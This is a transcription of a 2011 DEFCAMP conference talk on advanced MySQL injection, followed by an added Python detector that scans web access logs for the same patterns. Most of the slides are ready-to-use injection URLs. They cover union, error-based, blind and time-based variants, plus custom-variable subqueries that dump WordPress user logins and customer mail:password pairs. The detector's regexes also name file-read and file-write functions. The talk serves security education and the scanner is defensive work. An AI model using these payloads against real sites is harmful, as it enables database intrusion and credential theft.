DEFCAMP – 2011: “Advanced Data Mining in MySQL Injections using Subqueries & Custom Variables”
  • 127.0.0.1/defcamp/0_o/index.php?id=2'+and+1=0+union+select+1,2,3,4,concat(@i:=0x00,@o:=0xd0a,benchmark(1010370,@o:=CONCAT(@o,0xd0a,(SELECT+concat(0x3c62723e,@i:=user_login)+FROM+wp_users+WHERE+user_login>@i+order+by+user_login+LIMIT+1))),@o),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+information_schema.tables--
  • Advanced data mining in MySQL injections using subqueries and custom variables

    1. DEFCAMP – 2011: “Advanced Data Mining in MySQL Injections using Subqueries & Custom Variables”
    2. - CONTENTS -
       [ * ] Introductory notions: SQL, SQL injections
       [ * ] Custom variables and subqueries in MySQL
       [ * ] Optimizing the classic information-extraction techniques:
       - MySQL variables ( Server System Variables / Session Variables )
       - the available databases ( schema_name / SCHEMATA )
       - their tables and columns ( table_name / column_name )
       - privileges ( USER_PRIVILEGES : GRANTEE/PRIVILEGE_TYPE/IS_GRANTABLE )
       - reading & writing files ( LOAD_FILE / INTO DUMPFILE - OUTFILE )
       - Denial of Service ( DoS ) attacks
    3. Structured Query Language (SQL) is the standard language used for manipulating and retrieving data from relational databases. Through SQL, a programmer or a database administrator can do the following:
       * modify the structure of a database;
       * change the configuration values for system security;
       * grant users rights over databases or tables;
       * query a database for information;
       * update the contents of a database.
    4. How does PHP + MySQL work?
       - the request made by the client
       - the processing of the request at server level
       - the response sent to the client as the result of the request
    5. What could possibly go wrong? !!!!!!
    6. SQL Injections: a technique of malforming SQL syntax by modifying the values of the $_GET, $_POST, cookie and header parameters, which are taken and processed by the server-side files without first filtering characters or commands that may be dangerous.
    7. Example of a classic MySQL injection.
    8. SQL injection types: UNION BASED
       index.php?id=1’ and 2=4 UNION SELECT 1,2,3,4,5,6,7,8,9,10 --
       index.php?poze=vedete"+and+false+union+all+select+1,2,version(),4,5,6+and+"1"="1
       index.php?id=-1+UNION+SELECT+1,convert(@@version using latin1),3,4,5--
       index.php? id=-1/*!AND*/1=1+UNiOn+ALl+SelECt+1,/**/2,/**/3,/**/4/**/limit/**/1,2
       index.php?id=1+and+1=0+union+select+ sql_no_cache+1,2,3,4,5
    9. SQL injection types: UNION BASED
    10. SQL injection types: ERROR BASED
        index.php?id=(@:=1)||@+group+by+concat(@@version,!@)having@||min(@:=0)--+
        Index.php?id=53+OR+(SELECT+COUNT(*)+FROM+(SELECT+1+UNION+SELECT+2+UNION+SELECT+3)x+GROUP+BY+CONCAT(MID((select+concat_ws(0x3a,version(),database(),user())),1,63),+FLOOR(RAND(0)*2)))+--+
        news.php?id=589'+or+1+group+by+concat((select+version()),floor(rand(0)*2))+having+min(0)+or+1-- +
        details.php?ID=9 or (select count(*) from mysql.user group by concat(version(),floor(rand(0)*2)))--
        ?productid=1124+and+row(1,2)in(select+count(*),concat((select+table_name+from+information_schema.tables+limit+3,1),0x3a,floor(rand(0)*2))as+a+from+information_schema.tables+x+group+by+a)--
    11. SQL injection types: ERROR BASED
    12. SQL injection types: BLIND
        index.php?id=1’ and substring(@@version,1,1)=4--
        index.php?id=1’ and substring(@@version,1,1)=5--
        index.php?id=1 and (SELECT 1 from admin limit 0,1)=1
        news.php?id = -1 'OR id = IF(ASCII(SUBSTRING (SELECT USER ()), 1, 1 )))>= 100, 1, SLEEP (3))
        index.html?mdl=5020+and+ascii(lower(substring((select+table_name+from+information_schema.tables+limit+17,1),1,1 )))>1
        index.php?id=1 and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=2),1,1))>103
        script.php?par=1 and IF(ASCII(SUBSTRING((SELECT USER()),1,1)))>=100,1, BENCHMARK(2000000,MD5(NOW()))) –
        script.php?par=1 and IF(ASCII(SUBSTRING((SELECT USER()), 1, 1)))>=100, 1, SLEEP(3)) --
    13. SQL injection types: BLIND
    14. MySQL Custom Variables
    15. MySQL Sub-Queries
        SELECT * FROM t1 WHERE column1 = (SELECT column1 FROM t2);
    16. MySQL injections using Custom Variables:
        CLASSIC SYNTAX: index.php?id=2’+and+1=0+union+select+1,2,3,4,5--
        NEW SYNTAX: index.php?id=2’+and+1=0+union+select+@i:=version(),@i,@i,@i,@i--
        @i:=concat( version(),0x3a,database() )
        @i:=cast(version()+as+binary)
        @i:=convert(version(),binary)
        @i:=convert(version()+using+latin1)
        @i:=aes_decrypt(aes_encrypt(version(),1),1)
        @x:=concat(0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name)
    17. MySQL injections using SubQueries:
        index.php?id = -1+union+select+*+from+users,(select+1,2,3,4,5,6)a--
        index.php?id=-1+union+(select 1,2,3,4,5 order by 1 where 1=2) UNION (select1,2,3,4,5)--+--X
        id=3 AND (SELECT 7574 FROM(SELECT COUNT(*) ,CONCAT(CHAR(58,103,104,115,58),(SELECT (CASE WHEN (7574=7574) THEN 1 ELSE 0 END)), CHAR(58,101,118,118,58), FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    18. MySQL injections using SubQueries + Custom Variables:
        index.php?id=-4 union select 1,2,(select(@x) from(select(@x:=0x00) , (select (null) from (information_schema.columns) where (table_schema!=‘information_schema’) and (0x00) in (@x:=concat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x),4--
        index.php?id=-1 Union select 1,2, concat(@i:=0x00,@o:=0x0d0a, benchmark(150, @o:=CONCAT(@o,0x0d0a,(SELECT+concat(@i:=mail,0x3a,password)+from+customers+WHERE+mail > @i+order+by+mail+LIMIT+1+))),o),4
        index.php?id=-7’ union (select * from (select @i:=version())q join (select@i)w join (select@i)e join (select @i)r join (select @i)t join (select @i)y join (select @i)u join (select @i)i join (select @i)o)--+--qwertyxxxxxxxx
    19. MySQL injections using SubQueries + Custom Variables:
        index.php?id=2'+and+1=0+union+select+1,2,3,4,concat(@i:=0x00,@o:=0xd0a,benchmark(1010370,@o:=CONCAT(@o,0xd0a,(SELECT+concat(0x3c62723e,@i:=user_login)+FROM+wp_users+WHERE+user_login>@i+order+by+user_login+LIMIT+1))),@o),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+information_schema.tables--
    20. ………
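
A defensive counterpart to the request shapes listed in the slides, added here as an example and not part of the original talk: a Python scan of web access-log lines that undoes URL encoding, case mixing and comment padding, then flags the MySQL constructs the slides rely on (UNION SELECT, `@var:=` assignments, metadata tables, the `floor(rand(0)*2)` grouping error, `benchmark`/`sleep`). The signature names, the log layout and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Signature names are this example's own; the patterns cover constructs shown in the slides.
SIGNATURES = {
    "union_select": re.compile(r"union\s*(?:all\s*)?\(?\s*select"),
    "user_variable": re.compile(r"@\w*\s*:="),  # @i:=..., and the bare @:= form
    "metadata_schema": re.compile(r"\binformation_schema\b|\bmysql\.user\b"),
    "error_rand_group": re.compile(r"floor\s*\(\s*rand\s*\(\s*0\s*\)\s*\*\s*2\s*\)"),
    "timing": re.compile(r"\b(?:benchmark|sleep)\s*\("),
    "file_io": re.compile(r"\bload_file\s*\(|\binto\s+(?:dump|out)file\b"),
}
# Assumed log layout: client address first, request line in double quotes.
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def normalize(query):
    """Undo URL encoding, case mixing and comment padding before matching."""
    text = unquote_plus(query).lower()  # %27 -> ', + -> space
    # MySQL executes the body of /*! ... */, so keep it; plain /* */ is only a separator.
    text = re.sub(r"/\*!\d*(.*?)\*/", r" \1 ", text, flags=re.S)
    text = re.sub(r"/\*.*?\*/", " ", text, flags=re.S)
    return re.sub(r"\s+", " ", text)

def classify(target):
    """Return the sorted signature names found in a request target's query string."""
    text = normalize(urlsplit(target).query)
    return sorted(name for name, rx in SIGNATURES.items() if rx.search(text))

def scan(log_lines):
    """Return (client, target, hits) for every log line whose query matches."""
    findings = []
    for line in log_lines:
        m = REQUEST.match(line)
        if m and (hits := classify(m.group(2))):
            findings.append((m.group(1), m.group(2), hits))
    return findings

# Constructed sample lines: documentation addresses, shortened request shapes from the slides.
SAMPLE_LOG = [
    '198.51.100.7 - - [10/Oct/2011:09:00:01 +0000] "GET /index.php?id=2 HTTP/1.1" 200 5120',
    '203.0.113.20 - - [10/Oct/2011:09:00:05 +0000] "GET /index.php?id=-1/*!AND*/1=1+UNiOn+ALl+SelECt+1,/**/2,/**/3 HTTP/1.1" 200 5090',
    '203.0.113.20 - - [10/Oct/2011:09:00:09 +0000] "GET /index.php?id=2%27+and+1=0+union+select+@i:=version(),@i,@i-- HTTP/1.1" 200 5101',
    '203.0.113.20 - - [10/Oct/2011:09:00:14 +0000] "GET /news.php?id=589%27+or+1+group+by+concat((select+version()),floor(rand(0)*2))+having+min(0)+or+1-- HTTP/1.1" 500 312',
]

if __name__ == "__main__":
    for client, target, hits in scan(SAMPLE_LOG):
        print(client, hits, target)
```

Access logs normally record only the query string, so parameters sent in POST bodies, cookies or headers need the same normalization applied at the application or WAF layer. Hits are triage leads; the fix for the flaw itself is to bind request parameters instead of concatenating them into the SQL text.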
